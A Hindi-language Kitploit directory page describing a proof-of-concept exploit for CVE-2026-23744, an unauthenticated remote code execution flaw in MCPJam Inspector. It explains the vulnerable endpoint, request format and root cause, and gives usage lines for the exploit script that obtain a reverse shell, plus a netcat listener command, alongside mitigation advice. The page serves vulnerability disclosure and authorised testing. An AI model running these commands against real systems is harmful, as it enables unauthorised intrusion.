Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2026-23744 — CVE-2026-23744 के लिए प्रमाण-अवधारणा एक्सप्लॉइट, MCPJam Inspector में एक अप्रमाणित RCE। एक कमजोर API एंडपॉइंट के माध्यम से रिवर्स शेल और कमांड निष्पादन प्रदान करता है। | Kitploit
उपकरण/GitHubGitHub/rohit-sundar/cve-2026-23744
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोललर्निंग और शिक्षारिमोट एक्सेस टूललैब और अभ्यास
GitHubrohit-sundar/cve-2026-23744

cve-2026-23744

CVE-2026-23744 के लिए प्रमाण-अवधारणा एक्सप्लॉइट, MCPJam Inspector में एक अप्रमाणित RCE। एक कमजोर API एंडपॉइंट के माध्यम से रिवर्स शेल और कमांड निष्पादन प्रदान करता है।

1 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें

CVE-2026-23744 – MCPJam Inspector अप्रमाणित रिमोट कोड निष्पादन (RCE)

विवरण

  • उत्पाद: MCPJam Inspector
  • प्रभावित संस्करण: ≤ 1.4.2
  • फिक्स्ड संस्करण: 1.4.3
  • प्रकार: अप्रमाणित रिमोट कोड निष्पादन (RCE)
  • हमला वेक्टर: नेटवर्क
  • प्रमाणीकरण आवश्यक: नहीं
  • उपयोगकर्ता इंटरैक्शन आवश्यक: नहीं
  • CVSS v3.1: 9.8 (गंभीर)

CVE-2026-23744 एक गंभीर अप्रमाणित रिमोट कोड निष्पादन (RCE) भेद्यता है जो MCPJam Inspector ≤ 1.4.2 को प्रभावित करती है। यह समस्या इसलिए उत्पन्न होती है क्योंकि Inspector एक प्रबंधन एंडपॉइंट (/api/mcp/connect) को उजागर करता है जो उपयोगकर्ता-नियंत्रित MCP सर्वर कॉन्फ़िगरेशन स्वीकार करता है और पर्याप्त प्रमाणीकरण या सुरक्षा प्रतिबंधों के बिना प्रक्रिया निष्पादन को ट्रिगर कर सकता है। प्रभावित संस्करण डिफ़ॉल्ट रूप से localhost के बजाय 0.0.0.0 (सभी इंटरफेस) पर सुनते हैं, जिससे यदि सेवा नेटवर्क-सुलभ है तो दूरस्थ शोषण संभव हो जाता है।

तकनीकी विवरण

यह भेद्यता निम्नलिखित एंडपॉइंट से जुड़ी है:

root@kitploit:~
POST /api/mcp/connect

एंडपॉइंट एक JSON ऑब्जेक्ट स्वीकार करता है जिसमें सर्वर कॉन्फ़िगरेशन होता है, जैसे:

root@kitploit:~
{
  "serverConfig": {
    "command": "<executable>",
    "args": ["<arguments>"],
    "env": {}
  },
  "serverId": "<identifier>"
}

यह आपूर्ति की गई कॉन्फ़िगरेशन का उपयोग MCPJam Inspector द्वारा एक नया MCP सर्वर प्रक्रिया बनाने और प्रबंधित करने के लिए किया जाता है। चूंकि एंडपॉइंट में पर्याप्त प्रमाणीकरण और सुरक्षा नियंत्रणों का अभाव है, एक हमलावर मनमानी प्रक्रिया परिभाषाएँ प्रस्तुत कर सकता है जो Inspector सेवा द्वारा निष्पादित की जाती हैं।

मूलतः, यह भेद्यता क्रिटिकल फ़ंक्शन के लिए लापता प्रमाणीकरण (CWE-306) का एक मामला है जिसमें एप्लिकेशन विश्वसनीय स्थानीय उपयोगकर्ताओं के लिए इच्छित कार्यक्षमता को उजागर करता है और इसे पर्याप्त सुरक्षा जांच के बिना नेटवर्क पर सुलभ बनाता है।

मूल कारण

यह भेद्यता दो डिज़ाइन दोषों से उत्पन्न होती है:

  1. प्रक्रिया प्रबंधन तक अप्रमाणित पहुंच
  • API उपयोगकर्ताओं को यह परिभाषित करने की अनुमति देता है कि MCP सर्वर कैसे लॉन्च किए जाते हैं।
  • महत्वपूर्ण कार्यक्षमता प्रमाणीकरण के बिना सुलभ है।
  • उपयोगकर्ता-नियंत्रित प्रक्रिया पैरामीटर्स को एप्लिकेशन द्वारा बिना किसी आगे के सत्यापन के विश्वसनीय माना जाता है।
  1. असुरक्षित डिफ़ॉल्ट एक्सपोज़र
  • MCPJam Inspector डिफ़ॉल्ट रूप से 0.0.0.0 पर सुनता है।
  • प्रबंधन API नेटवर्क पर अन्य सिस्टम से पहुँच योग्य है।
  • हमलावर सीधे प्रक्रिया निर्माण कार्यक्षमता के साथ दूरस्थ रूप से बातचीत कर सकते हैं।

परिणामी हमला पथ को इस प्रकार देखा जा सकता है:

root@kitploit:~
हमलावर → /api/mcp/connect → प्रक्रिया निर्माण → ऑपरेटिंग सिस्टम

चूंकि एप्लिकेशन सीधे ऑपरेटिंग सिस्टम प्रक्रिया निर्माण के साथ इंटरफ़ेस करता है, सफल शोषण के परिणामस्वरूप MCPJam Inspector सेवा के सुरक्षा संदर्भ में मनमाना कमांड निष्पादन हो सकता है।

उपयोग

root@kitploit:~
python3 exploit.py -t <target_url> -tport <target_port> -lhost <local_ip> -lport <port>
  • -t (या) --target: लक्ष्य URL या लक्ष्य IP पता।
  • -tport (या) --target-port: कनेक्ट करने के लिए लक्ष्य पोर्ट, अधिकांश मामलों में यह MCPJam Inspector के लिए 6274 है। इस तर्क का उपयोग न करें यदि MCPJam Inspector कहीं और होस्ट किया गया है, जैसे किसी उपडोमेन या वर्चुअल होस्ट में। इसके बजाय उपडोमेन या वर्चुअल होस्ट निर्दिष्ट करने के लिए -t तर्क का उपयोग करें।
  • -lhost (या) --local-host: रिवर्स शेल के वापस कनेक्ट होने के लिए सार्वजनिक IP पता।
  • -lport (या) --local-port: रिवर्स शेल के लिए उपयोग किया जाने वाला पोर्ट।
root@kitploit:~
python3 exploit.py -t <target_url> -tport <target_port> -lhost <local_ip> -lport <port> -c '<command>'
  • -c (या) --command: लक्ष्य पर निष्पादित किया जाने वाला कमांड।

इस प्रोग्राम का उपयोग करने से पहले, आपको पहले Netcat का उपयोग करके अपनी स्थानीय मशीन पर एक लिसनर शुरू करना होगा।

ऐसा करने के लिए, निम्नलिखित कमांड का उपयोग करें:

root@kitploit:~
nc -lvnp <port>

फिर, लक्ष्य पर रिवर्स शेल प्राप्त करने के लिए उपरोक्त कमांड चलाएँ।

प्रभाव

सफल शोषण एक हमलावर को अनुमति दे सकता है:

  • लक्ष्य होस्ट पर मनमाने कमांड निष्पादित करना,
  • संवेदनशील फ़ाइलों को पढ़ना या संशोधित करना,
  • स्थायित्व तंत्र स्थापित करना,
  • अतिरिक्त मैलवेयर या टूलिंग तैनात करना,
  • वातावरण में अन्य सिस्टम में पिवोट करना,
  • सेवा विशेषाधिकारों के आधार पर संभावित रूप से पूर्ण सिस्टम समझौता प्राप्त करना।

इस भेद्यता को CVSS v3.1 स्कोर 9.8 (गंभीर) दिया गया है, इसके नेटवर्क-आधारित हमला वेक्टर, प्रमाणीकरण की कमी, उपयोगकर्ता इंटरैक्शन की अनुपस्थिति, और गोपनीयता, अखंडता और उपलब्धता पर उच्च प्रभाव के कारण।

शमन

तुरंत MCPJam Inspector 1.4.3 या बाद के संस्करण में अपग्रेड करें। अतिरिक्त रक्षात्मक उपायों में शामिल हैं:

  • Inspector इंटरफ़ेस तक पहुंच को प्रतिबंधित करना,
  • जहाँ संभव हो सेवाओं को localhost से बाइंड करना,
  • फ़ायरवॉल नियमों के माध्यम से एक्सपोज़र को सीमित करना,
  • सेवा को आवश्यक न्यूनतम विशेषाधिकारों के साथ चलाना,
  • अनधिकृत पहुंच प्रयासों की निगरानी करना।

अस्वीकरण

यह PoC केवल शैक्षिक, रक्षात्मक सुरक्षा अनुसंधान और अधिकृत सुरक्षा परीक्षण के लिए है। इसका उपयोग केवल स्पष्ट अनुमति वाले सिस्टम के विरुद्ध किया जाना चाहिए। तृतीय-पक्ष सिस्टम के विरुद्ध अनधिकृत उपयोग लागू कानूनों और विनियमों का उल्लंघन कर सकता है। इस रिपॉजिटरी का मालिक इस प्रोग्राम के उपयोग से होने वाली किसी भी क्षति के लिए जिम्मेदार नहीं है।

स्रोत

  1. MITRE CVE रिकॉर्ड – CVE-2026-23744
  2. NIST राष्ट्रीय भेद्यता डेटाबेस (NVD) – CVE-2026-23744
  3. GitHub सुरक्षा सलाहकार (GHSA-232v-j27c-5pp6)
  4. CVE-2026-23744 – भेद्यता खोज
  5. CVE-2026-23744: डेवलपर्स को लक्षित करने वाला MCPJam Inspector में गंभीर RCE – CrowdSec
  6. CVE-2026-23744: MCPJam Inspector RCE भेद्यता – SentinelOne
टूल डाउनलोड करें